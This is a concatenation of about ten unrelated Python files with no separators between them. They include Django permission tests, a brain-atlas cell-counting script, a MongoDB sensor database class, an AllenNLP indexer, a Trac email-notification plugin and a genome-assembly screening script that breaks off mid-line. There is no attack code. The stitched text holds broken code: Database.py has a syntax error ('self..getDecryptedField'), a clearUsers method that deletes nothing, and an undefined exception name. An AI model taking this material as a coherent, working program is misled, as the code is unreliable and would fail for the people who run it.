PermissionTest(test.TestCase): @classmethod def setUpTestData(cls): cls.BUCKET1 = Bucket.objects.create(name="aws_bucket1") cls.BUCKET2 = Bucket.objects.create(name="aws_bucket2") cls.TEAM1 = Team.objects.create(name="Test Team1") cls.TEAM2 = Team.objects.create(name="Test Team2") BucketPermission.objects.create(bucket=cls.BUCKET1, team=cls.TEAM1) BucketPermission.objects.create(bucket=cls.BUCKET1, team=cls.TEAM2) cls.USER_REGULAR = User.objects.create_user( "", "regular", ) Membership.objects.create(team=cls.TEAM1, user=cls.USER_REGULAR) Membership.objects.create(team=cls.TEAM2, user=cls.USER_REGULAR) cls.USER_SUPER = User.objects.create_user( "", "super", is_superuser=True, ) for bucket in [cls.BUCKET1, cls.BUCKET2]: for i in range(2): Object.objects.create( bucket=bucket, key=f"object-{bucket.name}-{i}", size=100 ) def test_bucket_dedup(self): """ - user super see 2 buckets (all of them) - user regular see only bucket 1, one time """ self.assertEqual( list( Bucket.objects.filter_for_user(self.USER_REGULAR) .order_by("name") .values("name") ), [{"name": "aws_bucket1"}], ) self.assertEqual( list( Bucket.objects.filter_for_user(self.USER_SUPER) .order_by("name") .values("name") ), [{"name": "aws_bucket1"}, {"name": "aws_bucket2"}], ) def test_objects_dedup(self): """ regular user can see 2 objects super user can see 4 objects """ self.assertEqual( list( Object.objects.filter_for_user(self.USER_REGULAR) .order_by("key") .values("key") ), [{"key": "object-aws_bucket1-0"}, {"key": "object-aws_bucket1-1"}], ) self.assertEqual( list( Object.objects.filter_for_user(self.USER_SUPER) .order_by("key") .values("key") ), [ {"key": "object-aws_bucket1-0"}, {"key": "object-aws_bucket1-1"}, {"key": "object-aws_bucket2-0"}, {"key": "object-aws_bucket2-1"}, ], ) class PermissionTestWritableBy(test.TestCase): @classmethod def setUpTestData(cls): cls.BUCKET1 = Bucket.objects.create(name="aws_bucket1") cls.BUCKET2 = Bucket.objects.create(name="aws_bucket2") cls.TEAM1 = Team.objects.create(name="Test Team1") cls.TEAM2 = Team.objects.create(name="Test Team2") BucketPermission.objects.create( bucket=cls.BUCKET1, team=cls.TEAM1, mode=BucketPermissionMode.READ_ONLY ) BucketPermission.objects.create( bucket=cls.BUCKET2, team=cls.TEAM1, mode=BucketPermissionMode.READ_ONLY ) BucketPermission.objects.create(bucket=cls.BUCKET1, team=cls.TEAM2) cls.USER_REGULAR = User.objects.create_user( "", "regular", ) Membership.objects.create(team=cls.TEAM1, user=cls.USER_REGULAR) Membership.objects.create(team=cls.TEAM2, user=cls.USER_REGULAR) cls.USER_SUPER = User.objects.create_user( "", "super", is_superuser=True, ) def test_bucket_writable(self): """ - user super can write in bucket 1 and 2 - user regular can write in bucket 1 (only one RO flag, RW flag via team 2 supersede) - user regular can't write in bucket 2 """ self.assertTrue(self.BUCKET1.writable_by(self.USER_SUPER)) self.assertTrue(self.BUCKET2.writable_by(self.USER_SUPER)) self.assertTrue(self.BUCKET1.writable_by(self.USER_REGULAR)) self.assertFalse(self.BUCKET2.writable_by(self.USER_REGULAR)) from django.contrib import admin from .models import Activity, GitRepo, GitCommit admin.site.register(Activity) admin.site.register(GitRepo) admin.site.register(GitCommit) import argparse import os import logging import pandas as pd from tqdm import tqdm from brainio import brainio from imlib.IO.cells import get_cells from imlib.pandas.misc import sanitise_df from imlib.image.metadata import define_pixel_sizes from imlib.general.config import get_config_obj from imlib.source.source_files import get_structures_path from neuro.structures.structures_tree import ( atlas_value_to_structure_id, CellCountMissingCellsException, UnknownAtlasValue, ) from neuro.atlas_tools.misc import get_atlas_pixel_sizes from neuro.structures.IO import load_structures_as_df import cellfinder.tools.parser as cellfinder_parse from cellfinder.tools.prep import prep_atlas_conf, Paths LEFT_HEMISPHERE = 2 RIGHT_HEMISPHERE = 1 def region_summary_cli_parser(): parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser = cli_parse(parser) parser = cellfinder_parse.count_summary_parse(parser) parser = cellfinder_parse.pixel_parser(parser) return parser def cli_parse(parser): cli_parser = parser.add_argument_group("Input data options") cli_parser.add_argument( "--registered-atlas", dest="registered_atlas_path", type=str, help="The path to the atlas registered to the sample brain", ) cli_parser.add_argument( "--hemispheres", dest="hemispheres_atlas_path", type=str, help="The atlas with just the hemispheres encoded.", ) cli_parser.add_argument( "--xml", dest="xml_file_path", type=str, help="The xml file containing the cell locations", ) cli_parser.add_argument( "-o", "--output-dir", dest="output_dir", type=str, required=True, help="Output directory for all intermediate and final results.", ) return parser def get_cells_data(xml_file_path, cells_only=True): cells = get_cells(xml_file_path, cells_only=cells_only) if not cells: raise CellCountMissingCellsException( "No cells found in file: {}".format(xml_file_path) ) return cells def get_scales(sample_pixel_sizes, atlas_pixel_sizes, scale=True): if scale: sample_x, sample_y, sample_z = sample_pixel_sizes atlas_x_pix_size = atlas_pixel_sizes["x"] atlas_y_pix_size = atlas_pixel_sizes["y"] atlas_z_pix_size = atlas_pixel_sizes["z"] x_scale = float(sample_x) / float(atlas_x_pix_size) y_scale = float(sample_y) / float(atlas_y_pix_size) z_scale = float(sample_z) / float(atlas_z_pix_size) return x_scale, y_scale, z_scale else: return 1, 1, 1 def get_atlas_pixel_sizes(atlas_config_path): config_obj = get_config_obj(atlas_config_path) atlas_conf = config_obj["atlas"] atlas_pixel_sizes = atlas_conf["pixel_size"] return atlas_pixel_sizes def get_max_coords(cells): max_x, max_y, max_z = (0, 0, 0) for cell in cells: if cell.x > max_x: max_x = cell.x if cell.y > max_y: max_y = cell.y if cell.z > max_z: max_z = cell.z return max_x, max_y, max_z def transform_cell_coords(atlas, cell, scales): x_scale, y_scale, z_scale = scales # convert to atlas coordinates cell.soft_transform(x_scale, y_scale, z_scale, integer=True) # In case we reorientated the sample, not the atlas. flip_dims = False # FIXME: put CLI option if flip_dims: cell.transformed_y, cell.transformed_z = ( cell.transformed_z, cell.transformed_y, ) # TODO: do in cell # TEST: check that correct dim to flip cell.transformed_z = atlas.shape[2] - cell.transformed_z def get_cells_nbs_df(cells, structures_reference_df, structures_with_cells): structures_with_cells = list(structures_with_cells) cell_numbers = pd.DataFrame( columns=("structure_name", "hemisphere", "cell_count") ) for structure in structures_with_cells: for hemisphere in (1, 2): n_cells = len( [ c for c in cells if c.structure_id == structure and c.hemisphere == hemisphere ] ) if n_cells: struct_name = structures_reference_df[ structures_reference_df["structure_id_path"] == structure ]["name"].values[0] cell_numbers = cell_numbers.append( { "structure_name": struct_name, "hemisphere": hemisphere, "cell_count": n_cells, }, ignore_index=True, ) sorted_cell_numbers = cell_numbers.sort_values( by=["cell_count"], ascending=False ) return sorted_cell_numbers def get_structure_from_coordinates( atlas, cell, max_coords, order=(0, 1, 2), structures_reference_df=None ): transformed_coords = ( cell.transformed_x, cell.transformed_y, cell.transformed_z, ) try: atlas_value = atlas[ transformed_coords[order[0]], transformed_coords[order[1]], transformed_coords[order[2]], ] except IndexError as err: logging.warning( "The cell {}, scaled to {} " "falls outside of the atlas with " "dimensions {}. Treating as outside the brain".format( cell, transformed_coords, atlas.shape, max_coords, err ) ) return 0 if structures_reference_df is None: return atlas_value else: try: structure_id = atlas_value_to_structure_id( atlas_value, structures_reference_df ) except UnknownAtlasValue as err: print( "Skipping cell {} (scaled: {}), missing value {}".format( cell, transformed_coords, err ) ) return else: return structure_id def analysis_run(args, file_name="summary_cell_counts.csv"): args = prep_atlas_conf(args) atlas = brainio.load_any(args.paths.registered_atlas_path) hemisphere = brainio.load_any(args.paths.hemispheres_atlas_path) cells = get_cells_data( args.paths.classification_out_file, cells_only=args.cells_only, ) max_coords = get_max_coords(cells) # Useful for debugging dimensions structures_reference_df = load_structures_as_df(get_structures_path()) atlas_pixel_sizes = get_atlas_pixel_sizes(args.atlas_config) sample_pixel_sizes = args.x_pixel_um, args.y_pixel_um, args.z_pixel_um scales = get_scales( sample_pixel_sizes, atlas_pixel_sizes, args.scale_cell_coordinates ) structures_with_cells = set() for i, cell in enumerate(tqdm(cells)): transform_cell_coords(atlas, cell, scales) structure_id = get_structure_from_coordinates( atlas, cell, max_coords, order=args.coordinates_order, structures_reference_df=structures_reference_df, ) if structure_id is not None: cell.structure_id = structure_id structures_with_cells.add(structure_id) else: continue cell.hemisphere = get_structure_from_coordinates( hemisphere, cell, max_coords, order=args.coordinates_order ) sorted_cell_numbers = get_cells_nbs_df( cells, structures_reference_df, structures_with_cells ) combined_hemispheres = combine_df_hemispheres(sorted_cell_numbers) df = calculate_densities(combined_hemispheres, args.paths.volume_csv_path) df = sanitise_df(df) if not os.path.exists(args.output_dir): os.makedirs(args.output_dir) output_file = os.path.join(args.output_dir, file_name) df.to_csv(output_file, index=False) def calculate_densities(counts, volume_csv_path): """ Use the region volume information from registration to calculate cell densities. Based on the atlas names, which must be exactly equal. :param counts: dataframe with cell counts :param volume_csv_path: path of the volumes of each brain region :return: """ volumes = pd.read_csv(volume_csv_path, sep=",", header=0, quotechar='"') df = pd.merge(counts, volumes, on="structure_name", how="outer") df = df.fillna(0) df["left_cells_per_mm3"] = df.left_cell_count / df.left_volume_mm3 df["right_cells_per_mm3"] = df.right_cell_count / df.right_volume_mm3 return df def combine_df_hemispheres(df): """ Combine left and right hemisphere data onto a single row :param df: :return: """ left = df[df["hemisphere"] == LEFT_HEMISPHERE] right = df[df["hemisphere"] == RIGHT_HEMISPHERE] left = left.drop(["hemisphere"], axis=1) right = right.drop(["hemisphere"], axis=1) left.rename(columns={"cell_count": "left_cell_count"}, inplace=True) right.rename(columns={"cell_count": "right_cell_count"}, inplace=True) both = pd.merge(left, right, on="structure_name", how="outer") both = both.fillna(0) both["total_cells"] = both.left_cell_count + both.right_cell_count both = both.sort_values("total_cells", ascending=False) return both def main(): args = region_summary_cli_parser().parse_args() args = define_pixel_sizes(args) args.paths = Paths(args, args.output_dir) args.paths.registered_atlas_path = args.registered_atlas_path args.paths.hemispheres_atlas_path = args.hemispheres_atlas_path args.paths.classification_out_file = args.xml_file_path analysis_run(args) if __name__ == "__main__": main() home-suite-home/Home-Suite-Home # # Database.py import sys sys.path.append("..") import pymongo as mongo from timeKeeper import TimeStamps from Server_Component.Security import Security URL = 'localhost' PORT = 27017 # This class will be comprised of methods that will # interface with a MongoDB database. These methods should # expect values from the methods in Sensors.py, and # send them to the database as JSON payloads. class Database: def __init__(self, url = URL, port = PORT): self.url = url self.port = port self.connect_status = False try: self.client = mongo.MongoClient(self.url, self.port) self.connect_status = True except Exception as e: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") else: self.client = mongo.MongoClient() self.secure = Security(self.client) self.secure.setup() def connect(self): if self.connect_status == False: try: self.client = mongo.MongoClient(self.url, self.port) self.connect_status = True except ConnectionFailure: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect_status = False else: print("connection already established") # Populates the database with a single recod given its name, sensor type, and raw value. def sendSensorData(self, data, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] # ceate indexes to speed up common queries collection.create_index([("name", -1), ("type" , 1)]) collection.create_index([("name", -1), ("type" , 1), ("time" , -1)]) ts = TimeStamps().getTimestamp() dataobj = { "type": sensor_type, "name": name, "value": data, "time": ts } collection.insert_one(dataobj) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # Retrieves all values currently in the database def getData(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] records = collection.find({}, {'_id' : 0}) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return [] # Produces the average value of a sensor in a time period def getAvgVal(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] records = collection.find({'name' : name, 'type' : sensor_type}, {'_id' : 0, 'time' : 0, 'type' : 0, 'name' : 0}) total = 0 num = 0 for record in records: total += record['value'] num += 1 try: sensor_avg = total / num except Exception as e: sensor_avg = 0 return sensor_avg else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return 0 # Saves/ Updates sensor config data def saveConfigData(self, sensor_type, name, category, address, port, sub_address, min_threshold, max_threshold, units, alerts): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] dataobj = { "type": sensor_type, "name": name, "category": category, "address": address, "port": port, "sub_address": sub_address, "min_threshold" : min_threshold, "max_threshold" : max_threshold, "units" : units, "alerts": alerts } # First, check if there's a record for this sensor... if collection.count_documents({'name' : name, 'type' : sensor_type}) >= 1: # ... and update if there's an existing record collection.update_one({'name' : name, 'type' : sensor_type}, {'$set' :dataobj}) else: # Otherwise, insert the record collection.insert_one(dataobj) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # Recieves old document (given by getSensorConfig or a dict) as well as the fields of the updated records # And supplants them in the old record def editConfigData(self, doc, sensor_type, name, category, address, port, sub_address, min_threshold, max_threshold, units, alerts): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] sensor_collection = db['sensors'] # Enforce unique name-type pairs collection.create_index([("name", -1), ("type" , 1)], unique = True) dataobj = { "type": sensor_type, "name": name, "category": category, "address": address, "port": port, "sub_address": sub_address, "min_threshold" : min_threshold, "max_threshold" : max_threshold, "units" : units, "alerts": alerts } try: # LOL big fix for historical sensor data if doc["name"] != name: collection.update_one(doc, {'$set' : dataobj}) sensor_collection.update_many({"name" : doc["name"]} , {'$set' : {'name' : name}}) else: collection.update_one(doc, {'$set' : dataobj}) except Exception as e: print("Error in db: ", e) print("Entry already exists.") else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # retrieves a sensor's data in the database within a range of hours def getRecentSensorData(self, name, sensor_type, hours): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] # All records will have a ts value greater than this time_bound = (TimeStamps().getTimestamp()) - (3600 * hours) records = collection.find({'name' : name, 'type' : sensor_type, 'time': {'$gte': time_bound}}, {'_id' : 0}).sort("time", -1) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return [] # Returns the most recent value for a given sensor def getMostRecentSensorData(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] record = collection.find_one({'name': name, 'type' : sensor_type }, sort = [('time', -1)]) if record is None or str(record['value']) == 'nan': return 'NaN' return record['value'] else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return 0 # Returns minimum value of a sensor in a certain time frame def getRecentMax(self, name, sensor_type, hours): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] # All records will have a ts value greater than this time_bound = (TimeStamps().getTimestamp()) - (3600 * hours) record = collection.find_one({'name': name, 'type' : sensor_type, 'time' : { '$gte' : time_bound }}, sort = [('value', -1)]) if record is None or str(record['value']) == 'nan': return 'NaN' return record['value'] else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return 0 # Returns minimum value of a sensor in a certain time frame def getRecentMin(self, name, sensor_type, hours): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] # All records will have a ts value greater than this time_bound = (TimeStamps().getTimestamp()) - (3600 * hours) record = collection.find_one({'name': name, 'type' : sensor_type,'time' : { '$gte' : time_bound }}, sort = [('value', 1)]) if record is None or str(record['value']) == 'nan': return 'NaN' return record['value'] else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return 0 # Retrieves config doc for a sensor def getSensorConfig(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] record = collection.find_one({"name" : name, "type" : sensor_type}) return record else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return None # retrieves all config data def getConfigData(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] records = collection.find({}, {'_id' : 0}) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return [] # returns an array of field tyes def getFields(self, field): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] records = collection.find({}, {'_id' : 0}).distinct(field) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return [] # Add encryption: Saves pi credentials def saveCredentials(self, email, password): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['creds'] crypt = self.client['encryption']['__homeSuiteKeyVault'] crypt.drop() dataobj = { "email": email, "password" : self.secure.getEncryptedField(password, 1) } # First, check if there's a record for this sensor... if collection.count_documents({}) >= 1: # ... and update if there's an existing record collection.replace_one({}, dataobj) else: # Otherwise, insert the record collection.insert_one(dataobj) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() def getCredentials(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['creds'] record = collection.find_one({}, {'_id' : 0}) if not record: return None password = record['password'] record['password'] = self..getDecryptedField(password) return record else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return None # Saves user info to users collection. def saveUser(self, name, email): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] dataobj = { "name" : name, "email": email } # First, check if there's a record for this sensor... if collection.count_documents({'email' : email}) >= 1: # ... and update if there's an existing record collection.replace_one({'email' : email}, dataobj) else: # Otherwise, insert the record collection.insert_one(dataobj) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # returns dict of user doc comprised of name and email def getUser(self, email): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] record = collection.find_one({"email" : email}) return record else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return None def getAllUsers(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] records = collection.find({}, {'_id' : 0}) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return [] def deleteUser(self, email): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] collection.delete_one({ "email" : email}) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() def clearUsers(self): def deleteUser(self, email): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] collection.delete_many({}) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # Saves an entry in alert logs def saveLog(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['logs'] ts = TimeStamps().getTimestamp() dataobj = { "type": sensor_type, "name": name, "time": ts } collection.insert_one(dataobj) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # returns True if an alert has already been sent in the user-defined # time frame, and False otherwise def alertSent(self, name, sensor_type, minutes): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['logs'] time_bound = (TimeStamps().getTimestamp()) - (60 * minutes) filter = { 'name': name, 'type' : sensor_type, 'time' : {'$gte' : time_bound} } if collection.count_documents(filter) >= 1: return True else: return False else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return True # clears alert log def clearLog(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['logs'] collection.delete_many({}) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # removes a named sensor's config file def deleteConfigData(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] collection.delete_one({"name" : name, "type" : sensor_type}) print("deleting " + name + " : " + sensor_type + " ...") else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # Deletes all config data def clearConfigData(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] collection.delete_many({}) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # Deletes all records in the database def clear(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] collection.delete_many({}) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() from django.apps import AppConfig class MakananConfig(AppConfig): name = 'modules.classifier' from typing import Dict, List import itertools import numpy as np import json from overrides import overrides from allennlp.common.util import pad_sequence_to_length from allennlp.data.vocabulary import Vocabulary from allennlp.data.tokenizers.token import Token from allennlp.data.token_indexers.token_indexer import TokenIndexer @TokenIndexer.register("baidu-indexer") class SingleIdTokenIndexer(TokenIndexer[int]): def __init__(self, namespace: str = 'tokens', lowercase_tokens: bool = False ) -> None: self.namespace = namespace self.lowercase_tokens = lowercase_tokens self.w2i, self.emb_val = self.load_word_emb() @overrides def count_vocab_items(self, token: Token, counter: Dict[str, Dict[str, int]]): #donothing pass @overrides def tokens_to_indices(self, tokens: List[Token], vocabulary: Vocabulary, index_name: str) -> Dict[str, List[int]]: indices: List[int] = [] for token in tokens: text = token.text if self.lowercase_tokens: text = text.lower() indices.append(self.w2i[text]) return {index_name: indices} @overrides def get_padding_token(self) -> int: return 0 @overrides def get_padding_lengths(self, token: int) -> Dict[str, int]: # pylint: disable=unused-argument return {} @overrides def pad_token_sequence(self, tokens: Dict[str, List[int]], desired_num_tokens: Dict[str, int], padding_lengths: Dict[str, int]) -> Dict[str, List[int]]: # pylint: disable=unused-argument return {key: pad_sequence_to_length(val, desired_num_tokens[key]) for key, val in tokens.items()} def load_word_emb(self): with open('baidu/word2idx.json', encoding='UTF-8') as inf: w2i = json.load(inf) with open('baidu/usedwordemb.npy', "rb") as inf: word_emb_val = np.load(inf) return w2i, word_emb_val from boucanpy.core.base.repos import BaseRepo from boucanpy.db.models.black_listed_token import BlackListedToken from boucanpy.core.black_listed_token.data import BlackListedTokenData class BlackListedTokenRepo(BaseRepo): default_model = BlackListedToken default_data_model = BlackListedTokenData stat-kwon/notificationsrc/spaceone/notification/manager/identity_manager.py import logging from spaceone.core.manager import BaseManager from spaceone.core.connector.space_connector import SpaceConnector _LOGGER = logging.getLogger(__name__) class IdentityManager(BaseManager): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.identity_connector: SpaceConnector = self.locator.get_connector('SpaceConnector', service='identity') def get_user(self, user_id, domain_id): return self.identity_connector.dispatch('User.get', {'user_id': user_id, 'domain_id': domain_id}) def get_project(self, project_id, domain_id): return self.identity_connector.dispatch('Project.get', {'project_id': project_id, 'domain_id': domain_id}) def get_service_account(self, service_account_id, domain_id): return self.identity_connector.dispatch('ServiceAccount.get', {'service_account_id': service_account_id, 'domain_id': domain_id}) 10-100 # Generated by Django 2.2.10 on 2020-05-20 20:31 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('profile', '0036_auto_20200508_0751'), ('datasets', '0092_auto_20200520_1048'), ] operations = [ migrations.AddField( model_name='dataset', name='profile', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='profile.Profile'), ) ] examples/phobos/tests/test_std_typecons.py def test_import(): import std_typecons ladaegorova18/CalculationMethods from numpy.linalg import eig, inv, norm, cond import numpy as np from tabulate import tabulate def genVandermonde(n): result = np.zeros(shape=(n, n)) for i in range(n): for k in range(n): result[i, k] = (i + 1) ** ((n + 1 - (k + 1)) ** (-4)) return result def newton(X, epsilon): x_k = np.identity(X.shape[0]) x_k1 = 0.5 * (x_k + inv(x_k) @ X) while norm(x_k1 - x_k) > epsilon: x_k = x_k1 x_k1 = 0.5 * (x_k + inv(x_k) @ X) return x_k1 def eigMethod(X): V = eig(X)[1] sigma = np.diag(eig(X)[0]**(0.5)) return V @ sigma @ inv(V) def toFixed(numObj, digits=0): return f"{numObj:.{digits}f}" Cond = [] for i in range(2, 16): X = genVandermonde(i) eigRoot = eigMethod(X) if i in range(2, 8): newtonRoot = newton(X, 1e-3 * (i ** 2)) else: newtonRoot = newton(X, 1e-2 * (i ** 2)) Cond.append([i, toFixed(cond(X), 8), toFixed(cond(newtonRoot), 8), toFixed(cond(eigRoot), 8), toFixed(norm(newtonRoot @ newtonRoot - X), 8), toFixed(norm(eigRoot @ eigRoot - X), 8)]) print(tabulate(Cond, headers=['n', 'cond (A)', 'cond (B) (Newton)', 'cond (B) (Eig)', 'norm (B^2 - A) (newton)', 'norm (B^2 - A) (eig)'], tablefmt='pipe', numalign="right")) X = genVandermonde(3) print(X) root = eigMethod(X) print(root) print(root @ root)isabella232/TracPortalPlugintracportalopt/project/notification.py #! -*- coding: utf-8 -*- # # (C) 2013 Internet Initiative Japan Inc. # All rights reserved. # # Created on 2013/05/15 # @author: """Notify project owner with email when the project created successfully.""" from pkg_resources import resource_filename from trac.config import Option, ListOption from trac.core import Component, implements from trac.notification import Notify, NotifyEmail from trac.web.chrome import ITemplateProvider from tracportal.i18n import _ from tracportal.project.api import IProjectCreationInterceptor class ProjectCreationNotificationSystem(Component): implements(ITemplateProvider, IProjectCreationInterceptor) # options from_name = Option('tracportal', 'notify_email_from_name', doc=_('Sender name to use in notification emails.')) from_email = Option('tracportal', 'notify_email_from', doc=_('Sender address to use in notification emails.')) ccrcpts = ListOption('tracportal', 'notify_email_cc', doc=_('Email address(es) to always send notifications to, ' 'addresses can be seen by all recipients (Cc:).')) subject = Option('tracportal', 'notify_email_subject', default=_("Ready to start Trac project!"), doc=_('Subject in notification emails.')) # ITemplateProvider methods def get_templates_dirs(self): return [resource_filename(__name__, 'templates')] def get_htdocs_dirs(self): return [] # IProjectCreationInterceptor methods def pre_process(self, project_info, owner_info): pass def post_process(self, project_info, owner_info, env): if 'email' in owner_info: project_info['url'] = env.abs_href() support = { 'name': self.from_name or self.env.project_name, 'email': self.from_email or self.env.config.get('notification', 'smtp_from'), } notify_email = ProjectCreationNotifyEmail(self.env, (owner_info['email'],), tuple(self.ccrcpts), project_info, owner_info, support) notify_email.notify('') class ProjectCreationNotifyEmail(NotifyEmail): """Notification of a project creation.""" template_name = 'project_creation_notify_email.txt' def __init__(self, env, torcpts, ccrcpts, project_info, owner_info, support): NotifyEmail.__init__(self, env) self.torcpts = torcpts self.ccrcpts = ccrcpts self.project_info = project_info self.owner_info = owner_info self.support = support self.subject = self.subject def get_recipients(self, resid): return (self.torcpts, self.ccrcpts,) def notify(self, resid, subject=None, author=None): if subject: self.subject = subject self.from_name = self.support['name'] self.from_email = self.support['email'] self.replyto_email = self.support['email'] if self.data is None: self.data = {} self.data.update({ 'owner': self.owner_info, 'project': self.project_info, 'support': self.support, }) Notify.notify(self, resid) 0 t = int(input()) score_dict = dict([]) score_dict[0] = 1 score_dict[1] = 1 score_dict[2] = 2 def get_score(n): if n in score_dict: return score_dict[n] else: sum_n_3 = 0 for i in range(n-2): sum_n_3 += get_score(i) ret = 1 + get_score(n-2) + 2 * sum_n_3 # Same as 1 + sum_n_2 + sum_n_3 score_dict[n] = ret return ret inp_list = [] for i in range(t): inp_list.append(int(input())) for n in inp_list: print(get_score(n))gamcil/AAFTF import sys, os, shutil from subprocess import call, Popen, PIPE, STDOUT import subprocess from Bio import SeqIO from AAFTF.utility import execute from AAFTF.utility import calcN50 from AAFTF.utility import fastastats from AAFTF.resources import DB_Links from AAFTF.utility import status from AAFTF.utility import printCMD from AAFTF.utility import SafeRemove from AAFTF.utility import checkfile # logging - we may need to think about whether this has # separate name for the different runfolder def run(parser,args): if not args.workdir: args.workdir = 'aaftf-sourpurge_'+str(os.getpid()) if not os.path.exists(args.workdir): os.mkdir(args.workdir) bamthreads = 4 if args.cpus < 4: bamthreads = 1 #find reads forReads, revReads = (None,)*2 if args.left: forReads = os.path.abspath(args.left) if args.right: revReads = os.path.abspath(args.right) if not forReads: status('Unable to located FASTQ raw reads, low coverage will be skipped. Provide -l,--left or -r,--right to enable low coverage filtering.') # sys.exit(1) #parse database locations if not args.sourdb: try: DB = os.environ["AAFTF_DB"] except KeyError: if args.AAFTF_DB: SOUR = os.path.join(args.AAFTF_DB, 'genbank-k31.lca.json.gz') else: status("$AAFTF_DB/genbank-k31.lca.json.gz not found, pass --sourdb") sys.exit(1) SOUR = os.path.join(DB, 'genbank-k31.lca.json.gz') if not os.path.isfile(SOUR): status("{:} sourmash database not found".format(SOUR)) # should we prompt it to download sys.exit(1) else: SOUR = os.path.abspath(args.sourdb) # hard coded tmpfile assembly_working = 'assembly.fasta' megablast_working = 'megablast.out' blobBAM = 'remapped.bam' shutil.copyfile(args.input, os.path.join(args.workdir,assembly_working)) numSeqs, assemblySize = fastastats(os.path.join(args.workdir, assembly_working)) status('Assembly is {:,} contigs and {:,} bp'.format(numSeqs, assemblySize)) DEVNULL = open(os.devnull, 'w') #now filter for taxonomy with sourmash lca classify status('Running SourMash to get taxonomy classification for each contig') sour_sketch = os.path.basename(assembly_working)+'.sig' sour_compute = ['sourmash', 'compute', '-k', '31', '--scaled=1000', '--singleton', assembly_working] printCMD(sour_compute) subprocess.run(sour_compute, cwd=args.workdir, stderr=DEVNULL) sour_classify = ['sourmash', 'lca', 'classify', '--db', SOUR,'--query', sour_sketch] printCMD(sour_classify) # output csv: ID,status,superkingdom,phylum,class,order,family,genus,species,strain Taxonomy = {} UniqueTax = [] sourmashTSV = os.path.join(args.workdir, 'sourmash.csv') with open(sourmashTSV, 'w') as sour_out: for line in execute(sour_classify, args.workdir): sour_out.write(line) if not line or line.startswith('\n') or line.startswith('ID') or line.count(',') < 9: continue line = line.strip() cols = line.split(',') if 'found' in cols: idx = cols.index('found') Taxonomy[cols[0]] = cols[idx+1:] taxClean = [x for x in cols[idx+1:] if x] UniqueTax.append('{:}'.format(';'.join(taxClean))) elif 'nomatch' in cols: idx = cols.index('nomatch') Taxonomy[cols[0]] = cols[idx+1:] UniqueTax = set(UniqueTax) status('Found {:} taxonomic classifications for contigs:\n{:}'. format(len(UniqueTax), '\n'.join(UniqueTax))) if args.taxonomy: sys.exit(1) Tax2Drop = [] for k,v in Taxonomy.items(): v = [x for x in v if x] #remove empty items from list if args.debug: print('{:}\t{:}'.format(k, v)) if len(v) > 0: if not any(i in v for i in args.phylum): Tax2Drop.append(k) #drop contigs from taxonomy before calculating coverage status('Dropping {:} contigs from taxonomy screen'.format(len(Tax2Drop))) sourTax = os.path.join(args.workdir, 